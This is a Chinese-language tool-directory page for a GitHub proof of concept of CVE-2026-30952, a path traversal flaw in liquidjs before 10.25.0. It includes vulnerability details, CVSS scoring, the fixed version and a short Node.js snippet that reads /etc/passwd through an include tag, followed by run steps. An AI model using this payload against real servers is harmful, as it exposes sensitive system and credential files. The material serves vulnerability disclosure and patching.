Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-30952-PoC — CVE-2026-30952 的 PoC:liquidjs 中通过 layout、render 和 include 标签中的绝对路径导致的路径遍历漏洞。 | Kitploit
工具/GitHubGitHub/morielharush/cve-2026-30952-poc
漏洞分析漏洞利用Web应用程序漏洞利用Web安全
GitHubmorielharush/cve-2026-30952-poc

CVE-2026-30952-PoC

CVE-2026-30952 的 PoC:liquidjs 中通过 layout、render 和 include 标签中的绝对路径导致的路径遍历漏洞。

查看仓库
5个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-30952:LiquidJS 路径遍历 PoC

本仓库包含 CVE-2026-30952 的概念验证(PoC),这是 liquidjs 库(版本 < 10.25.0)中发现的一个高危路径遍历漏洞。

作者与研究人员:

Moriel Harush Maor Caplan

描述

该漏洞允许通过 layout、render 和 include 标签在配合绝对路径使用时实现任意文件访问。即使指定了 root 目录,该漏洞仍然存在,因为库的回退机制未能正确验证解析后的路径是否仍位于预期的根目录内。

影响: 如果攻击者能够控制模板内容或传递给这些标签的变量,则可以读取敏感文件(例如 /etc/passwd、环境文件)。


漏洞详情

  • CVE ID: CVE-2026-30952
  • GHSA ID: GHSA-wmfp-5q7x-987x
  • 严重性: 高危(8.7/10 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N)
  • 受影响版本: < 10.25.0
  • 已修复版本: 10.25.0

  • 概念验证(PoC)

    root@kitploit:~
    const { Liquid } = require('liquidjs');
    const e = new Liquid({ root: ['/tmp'], partials: ['/tmp'], dynamicPartials: true });
    e.parseAndRender('{% include page %}', { page: '../../../etc/passwd' }).then(o => console.log(o.slice(0,500)));
    
    image

    前提条件

    • 已安装 Node.js
    • 存在漏洞的 liquidjs 版本(npm install [email protected])

    复现步骤

    1. 克隆本仓库。
    2. 运行 npm install。
    3. 执行漏洞利用脚本:
      root@kitploit:~
      node exploit.js
      
    下载工具